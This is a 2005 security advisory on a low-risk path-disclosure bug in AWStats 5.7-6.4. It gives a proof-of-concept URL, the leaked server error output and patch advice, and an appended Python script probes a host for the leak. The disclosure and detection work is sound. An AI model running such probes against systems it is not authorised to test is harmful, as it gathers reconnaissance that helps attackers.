**************************************************************
*                     sile001 advisory                       *
*                                                            *
*  PRODUCT:        AWStats                                   *
*  VERSION:        5.7 - 6.4                                 *
*  VENDOR:         http://awstats.sourceforge.net            *
*  VULNERABILITY:  Path Disclosure                           *
*  RISK:           Low                                       *
*                                                            *
*  Found by: Silentium of Anacron Group Italy                *
*  date:     24/02/2005                                      *
*  e-mail:   anacrongroupitaly[at]autistici[dot]org          *
*  my_home:  http://www.autistici.org/anacron-group-italy    *
*                                                            *
**************************************************************


General product info
--------------------

AWStats (Advanced Web Statistics) is a powerful, full-featured web server
logfile analyzer which shows you all your web statistics. It works with
IIS 5.0+, Apache and all major web, wap, proxy and streaming server log
files (and even ftp server or mail logs) on all operating systems.
The current version is 6.4.


General bug info
----------------

When AWStats cannot find the configuration file it was asked for, its
error message includes the full filesystem path of the CGI directory and
every directory in its configuration search path. To reproduce, pass a
name that does not match any existing config file as the value of the
'config' parameter; AWStats looks for "awstats.<name>.conf", fails, and
echoes the paths it searched.


Exploiting this bug
-------------------

Input in your browser:

http://www.victim.com/cgi-bin/awstats.pl?config=silentium

Output from web server:

Error: Couldn't open config file "awstats.silentium.conf" nor "awstats.conf" after searching in path "/var/www/cgi-bin,/etc/awstats,/usr/local/etc/awstats,/etc,/etc/opt/awstats": No such file or directory
- Did you use the correct URL ?
Example: http://localhost/awstats/awstats.pl?config=mysite
Example: http://127.0.0.1/cgi-bin/awstats.pl?config=mysite
- Did you create your config file 'awstats.silentium.conf' ?
If not, you can run "/var/www/cgi-bin/tools/awstats_configure.pl" from command line, or create it manually.
Check config file, permissions and AWStats documentation (in 'docs' directory).

---

The first entry of the search path and the path of awstats_configure.pl
reveal the directory the CGI is served from: /var/www/cgi-bin. The
remaining entries reveal where the administrator may keep AWStats
configuration files. The value of 'config' is arbitrary; any name for
which no awstats.<name>.conf exists triggers the message.


Patching this bug
-----------------

Search the AWStats source for the $config variable and trace it to the
point where the "Couldn't open config file" error is built. Report only
that the requested configuration could not be found, without echoing the
search path or the absolute path of awstats_configure.pl, or serve a
generic error page for unknown config names.
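The following script is an added example and is not part of the original advisory or of AWStats. It probes an installation with an arbitrary non-existent config name and parses the response for the two places the error message leaks paths: the quoted search path list and the absolute path of awstats_configure.pl. The sample response is the error text quoted in the advisory, embedded here so the parser can be checked offline; the hostname, the config name "silentium" and the function names are assumptions.

```python
#!/usr/bin/env python3
"""Detect the AWStats 'config' path-disclosure described in the advisory.

extract_disclosed_paths() parses an AWStats error page and returns the
directories it reveals. probe() fetches awstats.pl with a config name
that should not exist and hands the body to the parser.
"""
import re
import sys
import urllib.parse
import urllib.request

# Constructed sample: the server output quoted in the advisory, used so the
# parser can be exercised without touching a live host.
SAMPLE_ERROR = (
    'Error: Couldn\'t open config file "awstats.silentium.conf" nor '
    '"awstats.conf" after searching in path "/var/www/cgi-bin,/etc/awstats,'
    '/usr/local/etc/awstats,/etc,/etc/opt/awstats": No such file or directory\n'
    '- Did you use the correct URL ?\n'
    'Example: http://localhost/awstats/awstats.pl?config=mysite\n'
    'Example: http://127.0.0.1/cgi-bin/awstats.pl?config=mysite\n'
    "- Did you create your config file 'awstats.silentium.conf' ?\n"
    'If not, you can run "/var/www/cgi-bin/tools/awstats_configure.pl" '
    'from command line, or create it manually.\n'
    "Check config file, permissions and AWStats documentation (in 'docs' directory).\n"
)

# The comma-separated list of directories AWStats searched for the config.
SEARCH_PATH_RE = re.compile(r'after searching in path "([^"]*)"')
# The absolute path of the helper script the message recommends running.
CONFIGURE_RE = re.compile(r'you can run "([^"]*?/)tools/awstats_configure\.pl"')


def extract_disclosed_paths(body):
    """Return the paths an AWStats error body leaks.

    Result keys:
      search_path : list of directories from the "after searching in path" list
      cgi_dir     : directory containing awstats.pl, taken from the
                    awstats_configure.pl path (None if not present)
      vulnerable  : True when either leak is present
    """
    result = {"search_path": [], "cgi_dir": None, "vulnerable": False}

    m = SEARCH_PATH_RE.search(body)
    if m:
        # Tolerate whitespace after commas in case the page was line-wrapped.
        result["search_path"] = [p.strip() for p in m.group(1).split(",") if p.strip()]

    m = CONFIGURE_RE.search(body)
    if m:
        result["cgi_dir"] = m.group(1).rstrip("/")

    result["vulnerable"] = bool(result["search_path"] or result["cgi_dir"])
    return result


def build_probe_url(base_url, config_name="silentium"):
    """Append ?config=<name> to the awstats.pl URL, encoding the name."""
    sep = "&" if "?" in base_url else "?"
    return base_url + sep + urllib.parse.urlencode({"config": config_name})


def probe(base_url, config_name="silentium", timeout=10):
    """Fetch awstats.pl with a non-existent config name and parse the reply.

    Only the body is inspected; AWStats may answer with any HTTP status.
    """
    url = build_probe_url(base_url, config_name)
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as e:
        body = e.read().decode("utf-8", errors="replace")
    return extract_disclosed_paths(body)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # e.g. ./awstats_pathcheck.py http://www.victim.com/cgi-bin/awstats.pl
        findings = probe(sys.argv[1])
    else:
        findings = extract_disclosed_paths(SAMPLE_ERROR)
    print("vulnerable :", findings["vulnerable"])
    print("cgi dir    :", findings["cgi_dir"])
    print("search path:", ", ".join(findings["search_path"]))
```

Run it with the awstats.pl URL as the only argument, or with no argument to parse the embedded sample. A response that contains neither the search-path list nor the awstats_configure.pl path is reported as not vulnerable, which is what a patched installation that returns a generic error should produce.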